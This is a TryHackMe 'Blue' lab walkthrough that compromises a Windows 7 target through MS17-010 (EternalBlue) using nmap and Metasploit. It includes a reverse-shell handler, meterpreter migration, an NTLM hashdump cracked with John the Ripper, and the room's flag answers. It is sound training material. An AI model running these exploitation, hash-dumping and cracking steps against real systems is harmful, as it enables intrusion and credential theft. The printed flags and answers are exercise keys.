Writeups and Walkthroughs
Eternal Blue


Last updated 1 year ago


Task 1 Reconnaissance - Deploy the machine

1.1 - Deploy the machine

🎯 Target IP: 10.10.33.26

Add the target to /etc/hosts and create a working directory for the machine, which will also hold the nmap scans.

su
echo "10.10.33.26 blue.thm" >> /etc/hosts

mkdir thm/blue
cd thm/blue

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target: this checks connectivity and gives a first hint about the OS.

ping -c 3 blue.thm
PING blue.thm (10.10.33.26) 56(84) bytes of data.
64 bytes from blue.thm (10.10.33.26): icmp_seq=1 ttl=127 time=73.9 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=2 ttl=127 time=70.3 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=3 ttl=127 time=75.1 ms

From these three ICMP replies we see a TTL of 127. TTL is a hop count, not a time: Windows sends packets with an initial TTL of 128, and a single router on the path decremented it to 127, while *nix systems usually start at 64. So the target is most likely a Windows system.
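The TTL reasoning above as a small added Python example (not part of the original walkthrough): it pulls the ttl= values out of ping output, matches the observed value to the nearest common default (64, 128, 255) and derives the implied hop count. The defaults table and the sample ping output are constructed here, and the result is a hint only, since hosts can change their default TTL and NAT or proxies can rewrite it.

```python
import re
from collections import Counter

# Common default initial TTLs. Hosts can change these (e.g. sysctl net.ipv4.ip_default_ttl)
# and middleboxes can rewrite them, so treat the result as a hint, not proof.
INITIAL_TTLS = {64: "Linux/Unix/macOS", 128: "Windows", 255: "network device/Solaris"}

TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def infer_from_ttl(observed):
    """Map an observed TTL to the nearest larger default and the hop count it implies."""
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return {"observed": observed, "initial": initial,
                    "hops": initial - observed, "os_family": INITIAL_TTLS[initial]}
    raise ValueError(f"TTL {observed} exceeds 255")


def fingerprint_ping(output):
    """Parse ping replies and use the most frequent TTL (replies may take different paths)."""
    ttls = [int(t) for t in TTL_RE.findall(output)]
    if not ttls:
        return None
    ttl, _ = Counter(ttls).most_common(1)[0]
    return infer_from_ttl(ttl)


# Constructed sample: the three replies shown in the walkthrough
PING_OUTPUT = """\
PING blue.thm (10.10.33.26) 56(84) bytes of data.
64 bytes from blue.thm (10.10.33.26): icmp_seq=1 ttl=127 time=73.9 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=2 ttl=127 time=70.3 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=3 ttl=127 time=75.1 ms
"""

if __name__ == "__main__":
    print(fingerprint_ping(PING_OUTPUT))  # initial 128, 1 hop, Windows
```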

1.2 - How many services are running under port 1000?

nmap -p1-1000 --open -sS -n -Pn blue.thm -oG open_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 19:35 CEST
Nmap scan report for blue.thm (10.10.33.26)
Host is up (0.069s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

3 ports open under port 1000

1.3 - What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

nmap -p135,139,445 -sV -sC -vvv -n -Pn blue.thm
PORT    STATE SERVICE      REASON          VERSION
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 39544/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 58246/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 23738/udp): CLEAN (Timeout)
|   Check 4 (port 12563/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-05T12:36:48-05:00
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-05T17:36:48
|_  start_date: 2023-06-05T17:02:02
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0243a7b722e5 (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   0243a7b722e50000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000

This is the important piece of information:

445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

MS17-010

Task 2 - Gain Access

2.1 - Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Start Metasploit

msfconsole -q
msf6 > search ms17-010
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

exploit/windows/smb/ms17_010_eternalblue

2.2 - Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

2.3 - Exploit the machine and gain a foothold.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST blue.thm
RHOST => blue.thm
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.80.228
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Task 3 - Escalate

3.1 - Convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
   

3.2 - Select this (use MODULE_PATH). Show options, what option are we required to change?

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.9.80.228:4444 -> 10.10.37.188:49211 (10.10.37.188)

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 2
SESSION => 2
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.80.228:4433 
[*] Post module execution completed
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

3.3 - Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > migrate 1068
[*] Migrating from 1364 to 1068...
[*] Migration completed successfully.
meterpreter > migrate 1704
[*] Migrating from 1068 to 1704...
meterpreter > migrate 1688
[*] Migrating from 1068 to 1688...
[*] Migration completed successfully.

Task 4 - Cracking

4.1 - Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

4.2 - Copy this password hash to a file and research how to crack it. What is the cracked password?

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jon_hash.txt

We copy this hash and crack it with John the Ripper using the rockyou.txt wordlist.

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jon_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (?)     
1g 0:00:00:00 DONE (2023-06-05 22:39) 1.369g/s 13973Kp/s 13973Kc/s 13973KC/s alr19882006..alpusidi

Jon's credentials are jon:alqfna22

alqfna22

Task 5 - Find flags!

5.1 - Flag1? This flag can be found at the system root.

Since we have a meterpreter shell, we can search for files directly on the system.

We start by changing directory to C:\ (the system root) and listing it; flag1.txt is right there.

cd C:\\
dir
cat flag1.txt
🚩Reveal Flag1

flag{access_the_machine}

5.2 - Flag2? This flag can be found at the location where passwords are stored within Windows.

Check the directory contents with the “dir” command; there we see the flag2.txt file.

cd C:/Windows/System32/config
cat flag2.txt
🚩Reveal Flag2

flag{sam_database_elevated_access}

5.3 - This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

meterpreter > search -f flag3.txt

The search result shows the path of flag3.txt; then read it.

🚩Reveal Flag3

flag{admin_documents_can_be_valuable}

The public exploit is listed on Exploit-DB as "Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)"; it can also be found with searchsploit from the CLI.

https://www.exploit-db.com/exploits/42315
Blue
tryhackme.com - © TryHackMe